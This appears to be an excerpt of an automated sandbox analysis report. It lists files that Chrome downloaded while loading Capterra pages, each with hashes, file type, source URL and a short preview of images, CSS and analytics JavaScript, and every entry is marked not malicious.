                                                                                                                                                                                                        SHA1:E3D2835541F3BDE267ECF5EB3390D940AA4F8168
                                                                                                                                                                                                        SHA-256:DCB77174934EAACB96B81A22A5CE0372C792B0F47AFB2111DC083EBE91EAC878
                                                                                                                                                                                                        SHA-512:3CC7049F114162395733770109C14527BDCF880D6D2F4D0673736CE9C75AF0B40678D5DDA041915122C5BAB3DFC6F3D9138D4542221C0305DAAB6D91278E36C4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...........8....sRGB.........IDATx^..lVE...m...HU,........1.!*F.P..hD#.QP4..@.(.}E.QD.Q...X...".......\-|f.<.|...w._.%.4.v..{.vwfv...w.2>9.`...H.K.|..*p.......(@:t...Z..z....r.z{...R>...@.l..0.|..1.f..%\.....B...#...<.O~..........:..;.5...K.......e.yH.z....|.p.R......s....f..#.G..Yh.#..mB=I..K..-..f...k..p..J...rVVT.5t$L~...._iw.PwN....._..H..!KHP.........J......F.z9....R..s..A;$......p_s..q8J..<..VY['.A4.2tD..FW{e.....P.$........m4.1=..w.R.=..a..3...;.(m...[..&.4..6..z!..S. W.}..V.h.......~....;S...Q.`.~?W.B.u..%.5.6i..Mo.{AR.....M.0.QJ..a.+..au.`....LJ/.LC[?.h.5....H.x........l.X......P...3 ..^.+...8..&..B.Dig8.;...B...:A.L.z..%m.7.../.6p........T......9.;.A...........h.. .t.N...2.{P...s;.?.r.$....N..Wb...V.S.p.P.D..!.A..z.+.oz...T.4.K.Cv #r.V....=..0.2{9.'..?....(m\......).?.L..?)..3......@.*......dSx. ..G0.<..!wJ.T.w...Y....l.8.....x....x......NZ..7.j.Z....#*..18P.|.UB..e..Z....Q[#.c......R..*.@..`t.T.QEB......vq...N^..e.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9317), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9317
                                                                                                                                                                                                        Entropy (8bit):5.498019609225227
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:7KacUqUJJKS+DH84C2BjUwaei34vYtmTy2a/9NRFdlchKws:maPqUJzW844UTyZGDs
                                                                                                                                                                                                        MD5:7675840B79CB3893C27D99C14A1048FD
                                                                                                                                                                                                        SHA1:6E245D9A1AE2BC444D7BD8B32D2444E0A8C6AC34
                                                                                                                                                                                                        SHA-256:B81864FDDF691B31A49991A8974184C370521DAEE84C870668BF9277F2149194
                                                                                                                                                                                                        SHA-512:3AD3006E14F98BB976524AAD90296055240F92FD6B33FA0A2E45FAFB45F9DFF4BE8BF5E95DB07EBE2A812AA21DBC571BB1C69F18ABF02E34A34BF83F2652F9B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/6577.5b5e609812e044d0.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6577],{66792:function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return w}});let r=i(43219),o=i(16794),n=i(52322),s=o._(i(2784)),l=r._(i(28316)),a=r._(i(50044)),u=i(69694),d=i(44671),c=i(95411);i(78485);let f=i(17942),g=r._(i(42889)),p={deviceSizes:[640,750,828,1080,1200,1920,2048,3840],imageSizes:[16,32,48,64,96,128,256,384],path:"/_next/image/",loader:"default",dangerouslyAllowSVG:!1,unoptimized:!1};function m(e,t,i,r,o,n,s){let l=null==e?void 0:e.src;e&&e["data-loaded-src"]!==l&&(e["data-loaded-src"]=l,("decode"in e?e.decode():Promise.resolve()).catch(()=>{}).then(()=>{if(e.parentElement&&e.isConnected){if("empty"!==t&&o(!0),null==i?void 0:i.current){let t=new Event("load");Object.defineProperty(t,"target",{writable:!1,value:e});let r=!1,o=!1;i.current({...t,nativeEvent:t,currentTarget:e,target:e,isDefaultPrevented:()=>r,isPropagationStoppe
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5511
                                                                                                                                                                                                        Entropy (8bit):7.358285121887729
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7j8W5N26MT0D5MdtbZPAVwzVJ6RJ0GBSo1lVIaKUpMO08t:+7wWoYNMtKwXyJ0GEo1Th50s
                                                                                                                                                                                                        MD5:7427ABF02A7F7D2394C9EF57A47361CE
                                                                                                                                                                                                        SHA1:4151384569D916F334EFA9DB608101ADDD8160A1
                                                                                                                                                                                                        SHA-256:91BF0314104304125B2F7A373FFFB4D82DA6430EC33558108997E0E817B404EC
                                                                                                                                                                                                        SHA-512:50716F21DD3EAC737834EBD781322DF33D8FC88935E8B294E488052505F4A839940E983773F8FA7E4901C6519797882E0C24539F3681E6F908A9B3FD7E4B0F71
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/9f57a44f-9475-4cc5-9886-3822c18b54d1.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...!....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24838
                                                                                                                                                                                                        Entropy (8bit):2.3123936816251356
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Fa0lD3+NH5Y6NPPz6goZXoSSMe2MZrkSylpN87wxov:RSUKEMlkNlpXCv
                                                                                                                                                                                                        MD5:9A7C6A64C52EAA1DC6FC290A935A2D01
                                                                                                                                                                                                        SHA1:BE06BE319FBC8876D68ED312BAE68907C897F546
                                                                                                                                                                                                        SHA-256:38CA62FCB1EFFC07AB4128F21883D112F2426B9EBC1B913A05FE759C3E0B6A9F
                                                                                                                                                                                                        SHA-512:73C929DE2CF7FBDB88F564F567D83688BBAA860B6A21D8E97201D609B0A0C1F21B30A966FD097C60C806350B91D1FF425E2091155FBD157AEF659D20CB257B7E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......@@.... .(B..F... .... .....nB........ ......S........ .h....\..(...@......... ............................................................................................................................................................................. .................................... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>1..........................................................................................................MA............................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                        MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                        SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                        SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                        SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnjRUV3FGTcuBIFDZFhlU4=?alt=proto
                                                                                                                                                                                                        Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3140
                                                                                                                                                                                                        Entropy (8bit):5.057393408198499
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cPnsjx5Dmmeqbd0/M8iI84vC1eThiER0oEWuy0UldKHXfG77+8V:Q9VKd0k8pCUidUQ3fG77L
                                                                                                                                                                                                        MD5:78682C81D6DEED253A00DB3B7D08CFB8
                                                                                                                                                                                                        SHA1:BE3FCC8147B4E79378F2241B7B121BD576EF46D4
                                                                                                                                                                                                        SHA-256:40DDC2D2D5305190CA1750B85F870B7A1DE57621D46D6A6186D61127B61D814F
                                                                                                                                                                                                        SHA-512:850FB1EFA83616B057E7B37353454743089B8BE542DD09ADE51D238926577C631925420967FAC610568C24374AB428B463E9FAFC6D92982CD24AF953FE72D2BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>2</title>. <defs>. <path d="M9.21875,0 L108.78125,0 C113.872625,0 118,4.12737496 118,9.21875 L118,108.78125 C118,113.872625 113.872625,118 108.78125,118 L9.21875,118 C4.12737496,118 0,113.872625 0,108.78125 L0,9.21875 C0,4.12737496 4.12737496,0 9.21875,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" op
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):46
                                                                                                                                                                                                        Entropy (8bit):4.4144413036949715
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YXca47fcaDFCIn:YMa49YI
                                                                                                                                                                                                        MD5:EA09F91FEBAA0DAA6FF7CA083C32EF03
                                                                                                                                                                                                        SHA1:7DB97F9A004B2197111F3DEED9F88773435EE2F5
                                                                                                                                                                                                        SHA-256:18942862D38FF7690D608CAD7358CB6012E0E21CF6239A8122FD1CE1D7E0D7F7
                                                                                                                                                                                                        SHA-512:C01CBDE1C9549A79DD203E06864EEB54F7B0E2369C4855EEBB35014D40888D7FED1BE734D02A510506E349F8E839E6A9A8AA91B7F88C4FBEEE367BF0154C81C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"reason_code":9,"reason":"Invalid page URL"}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (473), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):473
                                                                                                                                                                                                        Entropy (8bit):5.066274338471234
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:XzjbdHhjbzriSnRRlAXPqwXoPU6XoPpMfXoPRofXoPHXoPIrcdrXYb7zlhnEySza:fbjiKDOywXGXeOXLXAXsDQ7zXEDGs6
                                                                                                                                                                                                        MD5:FE8B06E215FFBE772F8F5EB04270B5E1
                                                                                                                                                                                                        SHA1:163523EE63F120A343D3C7EC0106AB330221A66B
                                                                                                                                                                                                        SHA-256:24248C73BCD855870A22DB4F16F2C1BE03F0AE054245D29E2FF91F3ACEE1E71B
                                                                                                                                                                                                        SHA-512:5B5ADEAA7D325F86FF3DA2890280EB73433284DE080A331D1339D83281F623C88E591E9E49FBEFA3D86991CD0F8069DD752BC58046F00279CE65CE6FFD0EF81C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/main-app-cdf9b20c0e3daebf.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1744],{19849:function(e,n,t){Promise.resolve().then(t.t.bind(t,89562,23)),Promise.resolve().then(t.t.bind(t,5685,23)),Promise.resolve().then(t.t.bind(t,51395,23)),Promise.resolve().then(t.t.bind(t,78703,23)),Promise.resolve().then(t.t.bind(t,93112,23)),Promise.resolve().then(t.t.bind(t,53751,23))}},function(e){var n=function(n){return e(e.s=n)};e.O(0,[1293,286],function(){return n(15391),n(19849)}),_N_E=e.O()}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32008)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):47680
                                                                                                                                                                                                        Entropy (8bit):5.315198888695839
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:P/BcPdPbl1rli9zNfDFNyozxLY+ww7iyNIiDzA41DIpwMIdUOTYRYRdiAR8aa4kH:PJ+DhsM+Aim6YSkVy3asztYFPAT27
                                                                                                                                                                                                        MD5:7E1862F7A390ED9FC02C299216395547
                                                                                                                                                                                                        SHA1:9BE3F87C9849CBDD8DABABCCEBE77FE5C6B30702
                                                                                                                                                                                                        SHA-256:DD2D8D288526B88B0EAE53168E31B4092ACF39ED38D40FFCBC6D0AB2F7A4AA66
                                                                                                                                                                                                        SHA-512:45EBA74A86E4CB778C406A5CC2CA56283D156D06B59CFD9ACA7221A9DC4BD1CFEBB740D6955CA054A88AFFACF4318F709ED39B0CC4A27978FB780E18D34DC0C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js-agent.newrelic.com/nr-spa-1215.min.js
                                                                                                                                                                                                        Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(42);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):185
                                                                                                                                                                                                        Entropy (8bit):5.230362293506695
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:XzOYNRfdHhOYNRfcZqVRNmT9STdEyqYxcF5cSI7UNCC5K6cJYpfMPYfNdS7ZRMYO:XzjbdHhjbzrmhSTmyqScF27UNCMsQMPC
                                                                                                                                                                                                        MD5:043FBC58B46202BA018E6393F1307A09
                                                                                                                                                                                                        SHA1:509101DA3F22B4F13D4C57799195E70B00993893
                                                                                                                                                                                                        SHA-256:A0B116C9DC488DB452FC9843C0B8A67ECEDCC704CA7FDCD43A3F88BDA89FE78E
                                                                                                                                                                                                        SHA-512:923B92B03D90B97FFE1F286D5851ED7367199EC0FA87E7768A94EC0B10E0BA555243EB46396BDA87BDDBEBE9214B5D05C35CC50948577019B12077710BFD7400
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5664],{85664:function(n,u,c){"use strict";c.r(u),c(16131),c(27872),u.default=()=>null},16131:function(){},27872:function(){}}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):121121
                                                                                                                                                                                                        Entropy (8bit):5.128698533269502
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:aw2xkAL5F5je6Mek8xeVMLAiqNIg6mh6WQt5fXWKNApWpbgBL2dDq2NIk0OD:awCkAL5F5je6Mek8xeVMLAiqNIg6mh6P
                                                                                                                                                                                                        MD5:9572AC2DE24517364D3CBCB56B690C0F
                                                                                                                                                                                                        SHA1:1C3BF1F44E26A582612D4137A0644E71FE48A5DA
                                                                                                                                                                                                        SHA-256:58CEE670CB637DE03C3A6B80E957035396D9A70649686C3835E56643B0AB02EB
                                                                                                                                                                                                        SHA-512:94F45BBF3DD59F4529424AB42C18B0836C6648B9948BFB02B151E8493A2B27D182C0DFC01FAB012ED4E456596BD77857E993B869CAD14EFC29BAEED211FAF95A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/css/d16ba7b341592212.css
                                                                                                                                                                                                        Preview:/*.! tailwindcss v3.2.4 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;tab-size:4;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-feature-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}tabl
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2808
                                                                                                                                                                                                        Entropy (8bit):7.873000283489786
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ojMO+LJL/k7CtSjOH/FhOeIkRCY3RCR7ajBC38UpoT40VE01:ojYdewN/FuC3YujC8UpotVh1
                                                                                                                                                                                                        MD5:AB924DE4E42A2833C61DACFD578A0DB9
                                                                                                                                                                                                        SHA1:904FB97D2CD7F6BFD1934A3B3AA808EBF4D21B2B
                                                                                                                                                                                                        SHA-256:051720B81200D96058C5DFAD6598913ABDBF4A386049805181CB867FBAB26A57
                                                                                                                                                                                                        SHA-512:09A24F922875115E2AA2A215EDDF7388EBB13F3F63FFEDB6F072D5289ADFCC5B6C9BC411048930C789FAF69B43ECAD41DC0DEFC485BA45E36E1A236467B072F5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.}p.......]r!wy..1.|.D...V.......D...b..8..:E..q,.S..g:Ju.......*..R2...E. .$....^.gw;..q..=.M....y.g?...v.p..~.L..C..-.%Z.J.$.hI(.P.%.DKB....-.%Z.J.$.hI(.P.%.DKB....-.%Z.J.$.hI(.P.%.DKB....-.%Z.J.$.hI(.P.%.DKB....-.%Z.J.$....6;r...6.F.^RRLJ..:....2p..`.........i...k...#@....!.O.......A..~t.D.....M1...(\...(...!#..........`.j..g@#N..(........wh..E.pt..c. .....l....7...Q.Hr#.Q..x.O/...1..).0..8.R.Y..v~....m4-.K.Cp7k...9D..@(.7o.+_..@j......xS...s.....|.......9p|)zvA"#&....]... .F.|.ml....P........T)B@..U`q.".3.....U.e.d ..B..7z".Kp.X.......N.&@.....YdW.....mi@...1*#...}..8..@..Z.d{.....X4...]...........7u....5.wf.N...."g...>..|.....B...V"U.G.Nt.r.@.8 g.d.X.to#}p#...!8G..x.)......;..i...if;g.h..i?Y.*C...#S.Iy....u..C..3..qV..7og.....Q.L=.L.;(}..~..Lc..@.8.D.=....0.@..9....+I.?).v....1....w.?.g...>...y{$..Y..3U.jVr*G.v......[.{A.{....1....'.Q.(...1.E~r...1..w?......O!."$"C4?r.^..c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65179), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65276
                                                                                                                                                                                                        Entropy (8bit):5.3532603082235495
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:A5D99eR7s83Hw4oUGaOGE477KiIY0MnZez7S7nM1En0wEJPddhMJCvOWIjQS31F:uDmFs83Hw47ZO7S7nwEYvoQSFF
                                                                                                                                                                                                        MD5:49357BD476BF9E4BF2A6992AB7374F1F
                                                                                                                                                                                                        SHA1:5D75E26D106AD28B5700FE46E13C2EA4BD467AD8
                                                                                                                                                                                                        SHA-256:264532AF47B2CFB6620970592478C442A0CD429BECCEAD9D062FF5A91284DC15
                                                                                                                                                                                                        SHA-512:622A895FA8E419D80D2EB6EF6D310897C303E1226D7B83F78FDF19DBECDABADEE9D54BFFB7DFF4CF325DFB385EF44FA6C5D6407B86C9F5B3D04E3EDA31EADD41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/* clarity-js v0.7.45: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return jr},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return Ar}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10571), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10571
                                                                                                                                                                                                        Entropy (8bit):5.205561835805551
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xr1PCZrIJCG4tCo5Cd7Yri8CoZxTC1rACCHmv+2C1JzC7WCTfOWxBWC/:X4tCwCdSZ5CX+2CeWCTN
                                                                                                                                                                                                        MD5:000591653CAE1D7A750E9DFEF1A863B3
                                                                                                                                                                                                        SHA1:8F9D8B263720FA8D31C617C587E26DD899FC0099
                                                                                                                                                                                                        SHA-256:B41FF1BE3882AF8CC09AB3A5E557F5A981B609D5AA09D4DEDD4CC554BCE884BE
                                                                                                                                                                                                        SHA-512:F2AEB082309A1E315F305D4B274D94CFFFCFCB0318D08BFDE51001FB92C576098790D3D297C535A716E214E196DDD09C2C2CC098047DD3566B974C41EF833D1B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8090],{70164:function(r,t,e){e.d(t,{Z:function(){return v}});var n=e(7653),o=e(57908),i=e(96890);function a(r){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var c=["gapless","align","className","children"];function u(){return(u=Object.assign?Object.assign.bind():function(r){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n])}return r}).apply(this,arguments)}var l=e(10803);function f(r){return(f="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var s=["variant","className","children"];function b(){return(b=Object.assign?Object.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):164509
                                                                                                                                                                                                        Entropy (8bit):5.302267249020549
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:xPpIomDmDTR50fjZwFMXRH49GT9U3v8TPGFsmV8KJNrVU/kxRfADkVWjem5KOs3C:LamD0Nb49gUE7crRAINF2l
                                                                                                                                                                                                        MD5:18CA8B674B620C8CC2F2CAF733E0BC5C
                                                                                                                                                                                                        SHA1:E837C958713CF2908F4C9C8FCDB3BDF8DE9C2C61
                                                                                                                                                                                                        SHA-256:0022366076896108377AA37F41AC951DBC89670E076BB39CA84544361D908E0C
                                                                                                                                                                                                        SHA-512:9ECBBCF2B263FE8D3E7CB365CC480325C3870BDFEA54730E2AC07271995DE7BA15E1D936588E3A5E69FE135BE045E8D492CCC48D30884CC3D1B3C26C6DE6FA6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";var t={log:"log",debug:"debug",info:"info",warn:"warn",error:"error"},e=console,n={};Object.keys(t).forEach((function(t){n[t]=e[t]}));var r="Datadog Browser SDK:",i={debug:n.debug.bind(e,r),log:n.log.bind(e,r),info:n.info.bind(e,r),warn:n.warn.bind(e,r),error:n.error.bind(e,r)},o="https://docs.datadoghq.com",a="".concat(o,"/real_user_monitoring/browser/troubleshooting"),s="More details:";function u(t,e){return function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];try{return t.apply(void 0,n)}catch(t){i.error(e,t)}}}var c,l=function(t,e,n){if(n||2===arguments.length)for(var r,i=0,o=e.length;i<o;i++)!r&&i in e||(r||(r=Array.prototype.slice.call(e,0,i)),r[i]=e[i]);return t.concat(r||Array.prototype.slice.call(e))},d=!1;function f(t){d=t}function p(t){return function(){return v(t,this,arguments)}}function v(t,e,n){try{return t.apply(e,n)}catch(t){if(h(t),c)try{c(t)}catch(t){h(t)}}}function h(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 111, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3625
                                                                                                                                                                                                        Entropy (8bit):7.931065579449654
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:vsUtKlfl1cG3amwIVNmPdAKKILlbDA2aZ20qeo5pdEh:EU4lfH4m9VN6KeNB5F5pdEh
                                                                                                                                                                                                        MD5:12B94AED0A972431C711BE5900D827D7
                                                                                                                                                                                                        SHA1:68001B275DA5CDC4F5C03558A200A69402435EC9
                                                                                                                                                                                                        SHA-256:3562E7F0A3BE880288692672B8451160859DA67C8701D858517308167DFA0DE5
